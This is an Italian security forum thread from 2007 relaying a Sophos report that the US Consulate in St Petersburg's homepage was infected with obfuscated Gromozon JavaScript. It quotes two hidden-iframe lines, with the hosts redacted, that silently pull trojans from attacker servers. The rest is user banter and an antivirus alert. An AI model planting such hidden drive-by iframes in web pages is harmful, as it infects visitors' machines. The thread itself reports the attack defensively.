Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > AV e sicurezza in generale

Recensione realme 16 5G: lo smartphone con Selfie Mirror ha una batteria da 6550mAh
Recensione realme 16 5G: lo smartphone con Selfie Mirror ha una batteria da 6550mAh
realme 16 5G è un nuovo smartphone con sensore Sony IMX 852 da 50MP sul retro e uno specchio selfie fisico integrato nella camera bar, una prima nel segmento di mercato. Batteria da 6550mAh in un corpo da 8,1mm e 183g, certificazione IP69K e ricarica da 45W completano un pacchetto aggressivo per la fascia media, per uno dei prodotti più interessanti del produttore sul piano commerciale
Come rispettare tutte le nuove regole per i monopattini elettrici? La guida per non rischiare sanzioni
Come rispettare tutte le nuove regole per i monopattini elettrici? La guida per non rischiare sanzioni
Sono ormai definitive le nuove norme del Codice della Strada per i monopattini elettrici. Non solo targa e assicurazione, le regole sono tante e riguardano diversi aspetti, vi spieghiamo come evitare sanzioni che possono essere salate
DLSS 4.5: con Dynamic Frame Generation e MFG 6X NVIDIA alza la posta
DLSS 4.5: con Dynamic Frame Generation e MFG 6X NVIDIA alza la posta
DLSS 4.5 introduce Dynamic Multi Frame Generation e MFG 6X, permettendo fino a cinque frame generati per ogni frame renderizzato. I test su Cyberpunk 2077 e 007 First Light mostrano forti incrementi di FPS e riduzione della latenza su RTX 5090 Laptop. Migliorano fluidità, stabilità e qualità visiva.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 14-09-2007, 12:53   #1
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
Un grande pesce preso nella rete - ancora Gromozon

Alcuni giorni fa SophosLabs ha individuato un javascript offuscato (Mal/ObfJS-C) nella homepage del Consolato degli Stati Uniti in Russia.

Analizzando il codice sorgente si può notare los cript offuscato e criptato:




lo script tenta di scrivere nella pagina un iframe che prova a far scaricare silenziosamente ulteriore codice maligno nel pc della vittima:

Codice:
<iframe name='6326fcf2ca' src='http://[removed].com/xxxx/index.php' width=10 height=12 style='display:none'></iframe>

Ad interrogare gli archivi della settimana scorsa sono emerse ben 400 pagine con la stessa infezione:




1. Sulla sinistra sono rappresentati un grande gruppo di nodi e ciasc'uno rappresenta un sito web compromesso. Il nodo evidenziato in giallo è quello del Consolato americano in st Petersburg.

2. I nodi confluiscono presso due nodi che fanno da vettore per scaricare il materiale infettivo.

3. Ogni vettore fa installare un trojan.


La pagina del Consolato Americano fa connettere ad entrambi i nodi infettivi facendo sì che si scarichino entrambi i trojan e ch nella pagina risulti un ulteriore iframe malevolo:

Codice:
<iframe src='http://[removed].info/info/' width='1' height='1' style='visibility: hidden;'></iframe>

L'attacco non era rivolto verso il Consolato in se ma ha seguito sempre lasolita tecnica con la quale questa banda opera che è simile al "pescare a strascico".



Fonte: sophos.com
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 14-09-2007, 16:52   #2
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22121
mi chiedo quando saranno fermati!
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 14-09-2007, 17:04   #3
pistolino
Senior Member
 
L'Avatar di pistolino
 
Iscritto dal: Jan 2005
Messaggi: 7200
Subito dopo aver letto il titolo "Un grande pesce preso nella rete", ho chiamato il super-eroe che debellerà il male rappresentato da Gromozon:


Si salvi chi può.

Regards
pistolino è offline   Rispondi citando il messaggio o parte di esso
Old 14-09-2007, 17:17   #4
BEY0ND
Senior Member
 
L'Avatar di BEY0ND
 
Iscritto dal: Apr 2007
Messaggi: 2306
mica l'avrà catturato lui???
BEY0ND è offline   Rispondi citando il messaggio o parte di esso
Old 14-09-2007, 18:16   #5
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22121
finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum

ovviamente si scherza!
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 14-09-2007, 18:24   #6
sampei.nihira
Senior Member
 
Iscritto dal: Aug 2006
Messaggi: 4350
Quote:
Originariamente inviato da c.m.g Guarda i messaggi
finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum

ovviamente si scherza!
sampei.nihira è offline   Rispondi citando il messaggio o parte di esso
Old 15-09-2007, 07:08   #7
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22121
Quote:
Originariamente inviato da sampei.nihira Guarda i messaggi
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 17-09-2007, 09:46   #8
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
e giusto poco fa' ecco che mi è successo:
Quote:
Requested URL: hxxp://geniv.forumcommunity.net/?t=6226730
Information: Contains suspicious code HEUR/Exploit.HTML
pure forumcommunity.net stanno infettando?
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 17-09-2007, 10:19   #9
lancetta
Senior Member
 
L'Avatar di lancetta
 
Iscritto dal: Feb 2007
Città: Salerno......
Messaggi: 3259
Quote:
Originariamente inviato da xcdegasp Guarda i messaggi
e giusto poco fa' ecco che mi è successo:


pure forumcommunity.net stanno infettando?
e sì.... la recrudescenza verso l'italia sta raggiungendo un nuovo picco
__________________
Opera disabilitazione script ed iframe Recuperare le proprie password on line. Messenger: massima attenzione ai SITI TRUFFA | GUIDA:ShutdownTimer (Spegnimento auto pc) | Quando il centro sicurezza non riconosce i soft. Guida a Malwarebytes' Anti-Malware = tiemp bell e na volta...
lancetta è offline   Rispondi citando il messaggio o parte di esso
Old 17-09-2007, 10:56   #10
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
non vedo l'ora di vederli alla gogna sti ....
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Recensione realme 16 5G: lo smartphone con Selfie Mirror ha una batteria da 6550mAh Recensione realme 16 5G: lo smartphone con Selfi...
Come rispettare tutte le nuove regole per i monopattini elettrici? La guida per non rischiare sanzioni Come rispettare tutte le nuove regole per i mono...
DLSS 4.5: con Dynamic Frame Generation e MFG 6X NVIDIA alza la posta DLSS 4.5: con Dynamic Frame Generation e MFG 6X ...
Plaud NotePin S, il registratore IA si fa indossabile (ma è facile da perdere) Plaud NotePin S, il registratore IA si fa indoss...
Redmi Watch 6 in prova: lo smartwatch con ampio display da 2000 nit a meno di 100 euro Redmi Watch 6 in prova: lo smartwatch con ampio ...
La nuova Dodge Charger arriva in Italia:...
Anthropic propone regole per bloccare i ...
Basta imitazioni: Secretlab adotta la li...
Il calcio non ha più segreti: l'I...
Coinbase for Agents: ChatGPT e Claude po...
Reddit lancia i video nei commenti: ecco...
Google 'Icefish': le TPU di prossima gen...
DREAME D10 Plus Gen 2 torna in offerta s...
AMD incassa un altro successo nell'AI: p...
AWS rende disponibile Graviton5: fino al...
Casa pulita in cambio dei dati: Shift ra...
La crisi delle memorie contiuerà:...
HONOR Magic 9: per il futuro top di gamm...
TIM incassa più di 1 miliardo di ...
Vivo Watch GT 2 arriva in Italia: uno sm...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 08:24.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v